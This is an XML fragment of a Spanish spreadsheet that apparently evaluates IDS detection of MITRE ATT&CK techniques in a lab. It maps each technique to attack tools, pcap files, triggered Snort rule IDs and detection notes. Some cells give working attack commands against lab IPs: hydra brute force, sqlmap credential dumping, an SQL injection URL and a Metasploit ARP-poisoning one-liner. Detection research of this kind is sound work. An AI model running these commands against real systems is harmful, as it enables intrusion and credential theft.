    <t>1016, 1025, 1071, 1129, 1141, 1145, 1201, 1206, 1213, 1218, 1231, 1288, 1301, 1433, 1434, 1489, 1520, 1521, 1543, 1551, 1606, 1662, 1826, 1852, 1877, 2010229, 2018413, 2019526, 2022520, 2027250, 2027261, 2027263, 2049402, 2062, 2100993, 2101016, 2101071, 2101129, 2101145, 2101201, 2101877, 43285, 43290, 825, 835, 839, 845, 849, 853, 879, 882, 885, 886, 887, 895, 896, 937, 940, 993</t>
  </si>
  <si>
    <t>1016, 1025, 1071, 1129, 1141, 1145, 1201, 1206, 1213, 1218, 1231, 1288, 1301, 1433, 1434, 1489, 1520, 1521, 1543, 1551, 1606, 1662, 17429, 1826, 1852, 1877, 2010229, 2018413, 2019526, 2022520, 2027250, 2027261, 2027263, 2049402, 2062, 2100993, 2101016, 2101071, 2101129, 2101145, 2101201, 2101877, 33608, 41742, 42289, 43285, 43290, 50447, 59258, 825, 835, 839, 845, 849, 853, 879, 882, 885, 886, 887, 895, 896, 937, 940, 993</t>
  </si>
  <si>
    <t>1016, 1025, 1071, 1129, 1141, 1145, 1201, 1206, 1213, 1218, 1231, 1288, 1301, 1433, 1434, 1489, 1520, 1521, 1543, 1551, 1606, 1662, 17429, 1826, 1852, 1877, 2000560, 2002749, 2002752, 2008330, 2009749, 2009885, 2010229, 2010377, 2010706, 2018413, 2019526, 2022520, 2027250, 2027261, 2027263, 2049402, 2062, 2100884, 2100937, 2100993, 2101016, 2101071, 2101129, 2101145, 2101201, 2101288, 2101489, 2101662, 2101852, 2101877, 33608, 41742, 42289, 43285, 43290, 50447, 59258, 825, 835, 839, 845, 849, 853, 879, 882, 885, 886, 887, 895, 896, 937, 940, 993</t>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecte el envío de una contraseña sobre el cuerpo de una petición HTTP POST. </t>
  </si>
  <si>
    <t>Ataque de fuerza bruta a formulario de acceso a página web phpMyAdmin. Comando: hydra -l root -P /usr/share/john/password.lst 192.168.2.2 http-post-form "/phpmyadmin/index.php:pma_username=^USER^&amp;pma_password=^PASS^:#1045 Cannot log in to the MySQL server"</t>
  </si>
  <si>
    <t>Establish Accounts</t>
  </si>
  <si>
    <t>T1585</t>
  </si>
  <si>
    <t>T1585.001</t>
  </si>
  <si>
    <t>Creación de cuentas de redes sociales</t>
  </si>
  <si>
    <t>Sitios web convencionales (Facebook, Github, Microsoft ...)</t>
  </si>
  <si>
    <t>T1585.001_establish-social-accounts.pcapng</t>
  </si>
  <si>
    <t>Siempre y cuando el origen sea la red a proteger, detección por anomalías que identifique un incipiente aumento de las peticiones a servidores de redes sociales.</t>
  </si>
  <si>
    <t>Compromise Infrastructure</t>
  </si>
  <si>
    <t>T1584.002</t>
  </si>
  <si>
    <t>DNS Server</t>
  </si>
  <si>
    <t>Envenenamiento de Caché DNS</t>
  </si>
  <si>
    <t>ettercap</t>
  </si>
  <si>
    <t>T1584_cache_dns.pcapng</t>
  </si>
  <si>
    <t>2100469, 2100384, 2002752, 2002749</t>
  </si>
  <si>
    <t>Una vez el servidor DNS se encuentra comprometido, no es posible determinar si las redirecciones basadas en una caché envenenada son maliciosas o no</t>
  </si>
  <si>
    <t>Manual [1]</t>
  </si>
  <si>
    <t>NO (no detectable por red)</t>
  </si>
  <si>
    <t>Secuestro / Redireccionamiento DNS</t>
  </si>
  <si>
    <t>T1584_secuestro_dns.pcapng</t>
  </si>
  <si>
    <t>2100384,2100469,2002752,2002749</t>
  </si>
  <si>
    <t>T1584.005</t>
  </si>
  <si>
    <t>Botnet</t>
  </si>
  <si>
    <t xml:space="preserve">Uso de Botnet </t>
  </si>
  <si>
    <t>Ares, Screenshot and key logging</t>
  </si>
  <si>
    <t>T1584.005-C2018.pcapng</t>
  </si>
  <si>
    <t>1413, 1417, 1448, 1917, 2049, 29456, 31136, 384, 385, 42340, 449, 566</t>
  </si>
  <si>
    <t xml:space="preserve">1413, 1417, 1448, 1917, 2001219, 2001972, 2003068, 2008578, 2010935, 2010937, 2010939, 2011716, 2012296, 2013479, 2015856, 2049, 2100566, 2101413, 29456, 31136, 384, 385, 42340, 449, 566
</t>
  </si>
  <si>
    <t>1413, 1417, 1448, 1917, 2001219, 2001972, 2003068, 2008578, 2010935, 2010937, 2010939, 2011716, 2012296, 2013479, 2015856, 2049, 2100566, 2101413, 23493, 28993, 29456, 31136, 384, 385, 4060, 42340, 44484, 44485, 44486, 44487, 44488, 44489, 449, 45941, 566</t>
  </si>
  <si>
    <t>1413, 1417, 1448, 1917, 2001117, 2001219, 2001972, 2002749, 2002752, 2003068, 2008578, 2009205, 2009206, 2009207, 2009208, 2009582, 2010935, 2010937, 2010939, 2011716, 2012296, 2013479, 2015856, 2023997, 2044666, 2049, 2100254, 2100384, 2100385, 2100449, 2100469, 2100486, 2100566, 2100615, 2100628, 2101413, 2101417, 2101917, 2102049, 23493, 28993, 29456, 31136, 384, 385, 4060, 42340, 44484, 44485, 44486, 44487, 44488, 44489, 449, 45941, 566</t>
  </si>
  <si>
    <t>La detección debe centrarse en otras fases del ciclo de vida de un ataque, como Phishing, DDoS...</t>
  </si>
  <si>
    <t>Uso de Ares y screenshots y key logging    https://www.unb.ca/cic/datasets/ids-2018.html</t>
  </si>
  <si>
    <t>Dataset CIC-2018</t>
  </si>
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>External Remote Services</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>Acceso a red VPN desde dispositivo no autorizado con credenciales robadas</t>
  </si>
  <si>
    <t>OpenVPN</t>
  </si>
  <si>
    <t>T1133_external-remote-services.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>24303</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 27611</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>24303</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 27611, 2101620, 2100527, 2002749, 2001117, 2101917</t>
    </r>
  </si>
  <si>
    <t>2101917, 2002749, 2100527, 2101620, 2001117</t>
  </si>
  <si>
    <t>NO***</t>
  </si>
  <si>
    <t xml:space="preserve">Existen varias variantes.
        Circunstancias concretas del ataque: el atacante realiza alguna interacción posterior una vez ha logrado acceder a la red (aplicable a esta técnica) como un escaneo de red o mensajes de anuncio de Host.
        Reglas personalizadas: regla que compruebe si las direcciones IP involucradas en los paquetes se corresponden con las autorizadas dentro de la red VPN (debe ser configurada manualmente).
</t>
  </si>
  <si>
    <t>Acceso a red VPN, sin interacciones adicionales más allá de las naturales al propio acceso</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>Inyección SQL</t>
  </si>
  <si>
    <t>Sqlmap</t>
  </si>
  <si>
    <t>T1190-sql_inyection1.pcapng</t>
  </si>
  <si>
    <t>2002752,2002749,50447</t>
  </si>
  <si>
    <t>Regla que detecte un posible intento al esquema de informacion de un servidor MySQL. Regla que detecte una sentencia SQL pudiendose tratar de una posible inyeccion SQL. Regla que detecte posible escaneo de vulnerabilidades de inyeccion SQL.</t>
  </si>
  <si>
    <t>Ejecucion de comando mediante sqlmap para probar diferentes SQL Injections a una página web. Comando: sqlmap -u http://192.168.2.2/payroll_app.php --forms --batch --passwords</t>
  </si>
  <si>
    <t>T1190-sql_inyection2.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1061</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,1122,1147</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2017808,2009815,2009714,2006446,2006445</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2008538,1061</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,1122,1147</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2017808,2009815,2009714,2006446,2006445,2008538,1061</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,1122,1147</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,19779</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,50447</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,31939,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>7070</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,2012885</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2101061,2017808,2009815,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009714</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2006446,2006445,2008538,1061</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,1122,1147,19779,50447,31939,7070</t>
    </r>
  </si>
  <si>
    <t>Damn Vulnerable Web App (DVWA)</t>
  </si>
  <si>
    <t>T1190-sql_injection-C2018.pcapng</t>
  </si>
  <si>
    <t>NO*</t>
  </si>
  <si>
    <t>Regla personalizada que detecte posibles cadenas asociadas a un ataque de inyección SQL en sentencias HTML</t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>HTML Exploit I - HTML Compilador</t>
  </si>
  <si>
    <t>Apache, Shadyantra</t>
  </si>
  <si>
    <t>T1189_drive-by-compromise-v1.pcapng</t>
  </si>
  <si>
    <t>NO**</t>
  </si>
  <si>
    <t>La detección de esta técnica será más o menos viable dependiendo del objetivo y método del atacante. Si el foco está fijado en la obtención de credenciales, si el ataque está elaborado resulta prácticamente imposible su detección. En caso de que se busque un acceso a la red de manera directa mediante ejecutables y/o malware, el tipo de contenido marcará su grado de detección.</t>
  </si>
  <si>
    <t>Carga de página web con exploit HTML para compilar código malware (no ejecutar)</t>
  </si>
  <si>
    <t>HTML Exploit II - Descarga de Ejecutable</t>
  </si>
  <si>
    <t>T1189_drive-by-compromise-v2.pcapng</t>
  </si>
  <si>
    <t>Carga de página web con exploit HTML para descargar malware en formato ejecutable .exe</t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>Añadir hardware</t>
  </si>
  <si>
    <t>SSH Server + USB(Simular USB con MV con SO)</t>
  </si>
  <si>
    <t>HardwareAdditions.pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías que identifique desviaciones en el tráfico de red, tales como metadatos o protocolos de gestión (DHCP,...) fuera de los habituales</t>
  </si>
  <si>
    <t>Aparición de una nueva MV en el entorno de la víctima simulando la insercion de un USB tipo Pwn Plug que se utiliza como nodo de acceso a la red de la víctima para posteriormente, aprovechando que el puerto de la víctima esta abierto, acceder al equipo.</t>
  </si>
  <si>
    <t>Phishing</t>
  </si>
  <si>
    <t>T1566</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
    <t>T1566.001</t>
  </si>
  <si>
    <t>Envío de emails con documentos maliciosos</t>
  </si>
  <si>
    <t>T1566.001-C2018.pcapng</t>
  </si>
  <si>
    <t>1292,46983,47398</t>
  </si>
  <si>
    <t>1292,2002749,2002752,2101292,46983,47398</t>
  </si>
  <si>
    <t>Detección por listas negras/anomalías que permitan detectar tráfico de red correspondiente a correos electrónicos con archivos adjuntos maliciosos</t>
  </si>
  <si>
    <t>T1566.002</t>
  </si>
  <si>
    <t>Obtener un acceso inicial mediante ingeniería social utilizando un enlace adjunto en un correo que descargue un fichero que establezca una sesión al equipo víctima</t>
  </si>
  <si>
    <t>SEToolKit, Metasploit</t>
  </si>
  <si>
    <t>T1566.002.pcapng</t>
  </si>
  <si>
    <t>Detección por listas negras/anomalías que permitan detectar tráfico de red correspondiente a correos electrónicos con enlaces maliciosos que contengan contenido malware</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>Content Injection</t>
  </si>
  <si>
    <t>T1659</t>
  </si>
  <si>
    <t>Realizar una suplantación de identidad DHCP, saturando el servidor DHCP verdadero para que el servidor DHCP del atacante procese las consultas de un usuario. Posteriormente se manipula alguna consulta inyectando contenido malicioso</t>
  </si>
  <si>
    <t>dhcpstarv, Metasploit</t>
  </si>
  <si>
    <t>ContentInjection.pcapng</t>
  </si>
  <si>
    <t>2100527,2002752,2002749</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100527</t>
  </si>
  <si>
    <t>La detección de esta técnica será más o menos viales dependiendo del objetivo y método del atacante. Si el ataque se realiza en conjunto con protocolos de gestion(DHCP) dificultará la detección. Resultará necesario monitorizar por la distribución a traves del tráfico de red de archivos malware</t>
  </si>
  <si>
    <t>Suplantacion de identidad de DHCP Server para posteriormente inyectar contenido en la víctima con malware</t>
  </si>
  <si>
    <t>Inyección</t>
  </si>
  <si>
    <t>Suite aircrack-ng</t>
  </si>
  <si>
    <t>T1659_inyeccion.pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Detección por anomalías, paquetes sospechosos de haber sido generados aleatoriamente y sin correlación con las comunicaciones establecidas. </t>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>Uso de una conexión RDP sin proteger para el acceso a un equipo</t>
  </si>
  <si>
    <t>RDP</t>
  </si>
  <si>
    <t>T1199_trusted-relationship.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2001330, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1448</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2001330, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1448</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2034857</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101448, 2101447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2001329</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2001330, 2009207, 2009206, 2009205, 2009208, 2002752, 2002749, 1448</t>
    </r>
  </si>
  <si>
    <t>2002752, 2009205, 2009206, 2009207, 2009208, 2002749</t>
  </si>
  <si>
    <t>SI*</t>
  </si>
  <si>
    <t xml:space="preserve">El ataque tiene un matiz clave. Si bien el ataque puede ser detectado por Snort (existen muchas variantes, aunque para esta instancia concreta, por ejemplo, sí que existe mecanismo de detección), el hecho de que se trate de un ataque procedente de un dominio de confianza infectado, dificulta su detección, pues bloquear estos paquetes podría imposibilitar comunicación con el dominio de confianza si no existiera amenaza </t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>Instalación de Plugin en Navegador Chrome que reenvía información relacionada con búsquedas del usuario a un servidor</t>
  </si>
  <si>
    <t>T1176_browser-extension.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, 2101917, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101620</t>
    </r>
  </si>
  <si>
    <t>2002752, 2101620, 2002749, 2101917</t>
  </si>
  <si>
    <t>Detección por anomalías basada en flujos de datos hacia direcciones no relacionadas con las búsquedas, normalmente en formato de objetos JavaScript</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>Establecimiento de tarea BITS en equipo Windows para garantizar persistencia trás reinicio del equipo</t>
  </si>
  <si>
    <t>BITSADMIN,METASPLOIT</t>
  </si>
  <si>
    <t>T1197.pcapng</t>
  </si>
  <si>
    <t>Se pueden monitorizar conexiones nuevas generadas por BITS</t>
  </si>
  <si>
    <t>Ejecución de comandos para la creación de una tarea BITS con rastro de red</t>
  </si>
  <si>
    <t>Pre-OS Boot</t>
  </si>
  <si>
    <t>T1542</t>
  </si>
  <si>
    <t>TFTP Boot</t>
  </si>
  <si>
    <t>T1542.005</t>
  </si>
  <si>
    <t xml:space="preserve">Modificación de imagen de SO mediante la suplantación de un Server TFTP </t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>T1542.005.pcapng</t>
  </si>
  <si>
    <t>1444,2008120,2008119,2008118</t>
  </si>
  <si>
    <t>1444,2100527,2101444,2008120,2002752,2002749,2008119,2008118</t>
  </si>
  <si>
    <t>2002752, 2101444, 2100527, 2008120, 2002749</t>
  </si>
  <si>
    <t>**Regla personalizada que comprueba si la IP del servidor TFTP es la del servidor legítimo ** Que el SO enviado por el atacante contenga algun tipo de malware detectable por un IDS</t>
  </si>
  <si>
    <t>Servidor TFTP utilizando Iventoy</t>
  </si>
  <si>
    <t>Server Software Component</t>
  </si>
  <si>
    <t>T1505</t>
  </si>
  <si>
    <t>SQL Stored Procedures</t>
  </si>
  <si>
    <t>T1505.001</t>
  </si>
  <si>
    <t>None (SQL injection using URL)</t>
  </si>
  <si>
    <t>T1505.001.pcapng</t>
  </si>
  <si>
    <t>2011039, 2006444</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>13513</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,50447,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>19438,2011039,2006444</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,2100472,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2011039,2006444,13513</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,50447,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>19438</t>
    </r>
  </si>
  <si>
    <t>2002752, 2100472, 2002749</t>
  </si>
  <si>
    <t>**Regla genérica que detecte en la petición "%27" que indica la representacion de comillas simples</t>
  </si>
  <si>
    <t>Ejecución de URL en navegador web (http://172.16.2.2:8080/contacto?apellidos=Fernandez%27;%20INSERT%20INTO%20contactos%20values%20(3,%20%27Atacante%27,%20%27Atacante%27,%20%27Atacante%27,%20100)--)</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>T1505.003</t>
  </si>
  <si>
    <t>Shell Web</t>
  </si>
  <si>
    <t>Metasploit</t>
  </si>
  <si>
    <t>T1503.005.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50447,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50182</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50202</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,2006408,50447,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50182,50202</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecta el intento de escaneo para comprobar la existencia de backdoor. </t>
  </si>
  <si>
    <t>El ataque busca aprovechar configuracion vulnerable de un servidor WampServer que permite subir y borrar contenido web mediante el uso de HTTP PUT y HTTP DELETE.
Se realiza la subida de un payload a un servidor web</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Password Guessing</t>
  </si>
  <si>
    <t>T1110.001</t>
  </si>
  <si>
    <t>Obtención de contraseña por fuerza bruta (adivinación)</t>
  </si>
  <si>
    <t>T1110.001.pcapng</t>
  </si>
  <si>
    <t>Obtener la contraseña para conectarse por SSH al equipo victima mediante fuerza bruta. Comando:  hydra -l dit -P pass.txt 172.16.2.2 -t 4 ssh</t>
  </si>
  <si>
    <t>FTP - Patator</t>
  </si>
  <si>
    <t>T1110.001-FTP-C2018.pcapng</t>
  </si>
  <si>
    <t>2002749, 2002752</t>
  </si>
  <si>
    <t>SSH - Patator</t>
  </si>
  <si>
    <t>T1110.001-SSH-C2018.pcapng</t>
  </si>
  <si>
    <t>650, 2003068, 2001219</t>
  </si>
  <si>
    <t>650,19559, 17317, 2003068, 2001219</t>
  </si>
  <si>
    <t>650, 2003068, 2001219, 19559, 17317, 2002749, 2002752, 2036752, 2100650</t>
  </si>
  <si>
    <t>Ataque sobre WPS</t>
  </si>
  <si>
    <t>wash, reaver</t>
  </si>
  <si>
    <t>T1110_wps.pcapng</t>
  </si>
  <si>
    <t>--</t>
  </si>
  <si>
    <t>Password Spraying</t>
  </si>
  <si>
    <t>T1110.003</t>
  </si>
  <si>
    <t>Ataque de fuerza bruta basado en diccionario de contraseñas</t>
  </si>
  <si>
    <t>wifite</t>
  </si>
  <si>
    <t>T1110_diccionario.pcapng</t>
  </si>
  <si>
    <t>NO (Ataque de L2)</t>
  </si>
  <si>
    <t>Password Cracking</t>
  </si>
  <si>
    <t>T1110.002</t>
  </si>
  <si>
    <t>Ataque PMKID</t>
  </si>
  <si>
    <t>hashcat, hcxpcapngtool, hcxdumptool</t>
  </si>
  <si>
    <t>T1110_pmkid.pcapng</t>
  </si>
  <si>
    <t>PTW/KoreK/FMS</t>
  </si>
  <si>
    <t>T1110_ptw_korek.pcapng</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>Falsa autenticación</t>
  </si>
  <si>
    <t>T1040_autenticacion.pcapng</t>
  </si>
  <si>
    <t>No existe detección posible ante este tipo de ataques. El uso de cifrado WEP incorpora vulnerabilidades intrínsecas a este.</t>
  </si>
  <si>
    <t>Credential Acess</t>
  </si>
  <si>
    <t>ChopChop</t>
  </si>
  <si>
    <t>T1040_chopchop.pcapng</t>
  </si>
  <si>
    <t>Fragmentación</t>
  </si>
  <si>
    <t>T1040_fragmentacion.pcapng</t>
  </si>
  <si>
    <t>Inundación MAC</t>
  </si>
  <si>
    <t>T1040_mac_flood.pcapng</t>
  </si>
  <si>
    <t>2013028, 50447</t>
  </si>
  <si>
    <t>50447, 2002749, 2100528, 2002752, 2013028, 2002824</t>
  </si>
  <si>
    <t>Regla personalizada que detecte un envío masivo de mensajes IPv4 con direcciones incorreladas con la red a proteger, y que aparenten ser completamente aleatorias</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>Adversary-in-the-Middle</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>ARP Cache Poisoning</t>
  </si>
  <si>
    <t>T1557.002</t>
  </si>
  <si>
    <t>Envenenamiento ARP</t>
  </si>
  <si>
    <t>Arpspoof</t>
  </si>
  <si>
    <t>T1557.002-ARP_poisoning1.pcapng</t>
  </si>
  <si>
    <t>2002752,2002749,2100472</t>
  </si>
  <si>
    <t>2002752, 2002749,2100472</t>
  </si>
  <si>
    <t>Envenamiento de tablas ARP mediante Arpspoof.</t>
  </si>
  <si>
    <t>T1557.002-ARP_poisoning2.pcapng</t>
  </si>
  <si>
    <t>Se realiza un ataque MITM, mediante el envenanamiento de las tablas de ARP caché de un equipo y su gateway. De esta toda se redirige todo el tráfico para que pase a través del equipo del atacante. Comando: msfconsole -x "use auxiliary/spoof/arp/arp_poisoning; set BIDIRECTIONAL true; set interface eth1; set DHOSTS 192.168.1.2; set SHOSTS 192.168.1.1; run -j -z; sleep 5; kill 0; exit"</t>
  </si>
  <si>
    <t>Suplantación ARP</t>
  </si>
  <si>
    <t>arpspoof</t>
  </si>
  <si>
    <t>T1557_arp_spoof.pcapng</t>
  </si>
  <si>
    <t>2100469, 2100384, 2002752, 2002749, 2100366, 2100408</t>
  </si>
  <si>
    <t>2100384,2002752,2100366,2100469,2100408,2002749</t>
  </si>
  <si>
    <t>Mediante el uso de preprocesadores, la detección de este ataque es posible estableciendo un asociación entre la IP a proteger y su dirección MAC correspondiente. De esta forma, se puede fundar una regla que detecte mensajes ARP que incumplen esta asociación y que avistan de un posible ataque por suplantación MAC</t>
  </si>
  <si>
    <t>DHCP Spoofing</t>
  </si>
  <si>
    <t>T1557.003</t>
  </si>
  <si>
    <t>DHCPig, servidor DHCP</t>
  </si>
  <si>
    <t>T1557_dhcp_spoofing.pcapng</t>
  </si>
  <si>
    <t>2100527, 2002749, 2002752</t>
  </si>
  <si>
    <t>2002752,2002749,2100527</t>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecte un envío masivo de procedimientos DHCP completos (DISCOVERY, OFFER, REQUEST, ACK). Otra alternativa es una regla personalizada que analice mensajes DHCP ACK con direcciones IP de servidores DNS distinta a la establecida en la red </t>
  </si>
  <si>
    <t>Agujero 196</t>
  </si>
  <si>
    <t>T1557_hole196.pcapng</t>
  </si>
  <si>
    <t>Suplantación del puente raíz</t>
  </si>
  <si>
    <t>yersinia</t>
  </si>
  <si>
    <t>T1557_puente_raiz.pcapng</t>
  </si>
  <si>
    <t>2100366, 2100384, 2002752, 2002749, 2100408</t>
  </si>
  <si>
    <t>2100384, 2002752, 2100366, 2100408, 2002749</t>
  </si>
  <si>
    <t>Si el ataque viene seguido de suplantaciones ARP, con el uso de preprocesadores de Snort resulta posible su detección. En caso de que el ataque se centre únicamente en el establecimiento del atacante como puente raíz, no existe mecanismo de detección</t>
  </si>
  <si>
    <t>Establecimiento de atacante como puente raíz</t>
  </si>
  <si>
    <t>Redirección</t>
  </si>
  <si>
    <t>ettercap, netwox</t>
  </si>
  <si>
    <t>T1557_redireccion.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
